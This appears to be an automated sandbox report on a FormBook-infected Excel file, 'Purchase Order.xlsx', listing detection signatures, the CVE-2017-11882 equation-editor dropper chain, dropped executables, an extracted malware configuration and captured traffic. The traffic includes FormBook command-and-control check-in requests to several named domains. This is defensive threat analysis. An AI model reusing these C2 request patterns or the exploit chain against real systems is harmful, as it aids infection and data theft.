Analysis Report Purchase Order.xlsx

Overview

General Information

Sample Name: Purchase Order.xlsx
Analysis ID: 344798
MD5: 568ad30c526d3950e00385f41e08cdf2
SHA1: a2599b55c9c9a6b39c019bfeda57b38654c72f48
SHA256: ae24343193734ee532e142a8e64a7f27d5faf33667a7818743fd91baca01f99b
Tags: VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 5.2.acqyswhf.exe.220000.0.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79f3", "KEY1_OFFSET 0x1bb41", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1bc3e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1a6b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa6e6bd38", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe ReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted file
Source: Purchase Order.xlsx ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.acqyswhf.exe.220000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49165 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: wntdll.pdb source: acqyswhf.exe, dtz25z5e9sr.exe, svchost.exe
Source: Binary string: svchost.pdb source: dtz25z5e9sr.exe, 00000006.00000002.2204947224.00000000002C4000.00000004.00000020.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_004059F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040659C FindFirstFileA,FindClose, 4_2_0040659C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004027A1 FindFirstFileA, 4_2_004027A1
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00C34005
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00C3C2FF

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 4x nop then pop esi 6_2_00415834
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 4x nop then pop edi 6_2_004162DD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 4x nop then pop edi 6_1_004162DD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 4x nop then pop esi 6_1_00415834
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop edi 10_2_000962DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop esi 10_2_00095834
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cdn.discordapp.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.159.130.233:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.159.130.233:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.land-il.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.fsjinhua.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.chenangopistolpermit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.streamelemeants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.mct.ltdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.bmtxm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View IP Address: 81.17.18.195 81.17.18.195
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\205620C7.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.land-il.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.fsjinhua.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.chenangopistolpermit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.streamelemeants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.mct.ltdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.bmtxm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 06:17:46 GMTServer: nginx/1.19.5Content-Type: text/html; charset=iso-8859-1Content-Length: 315host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
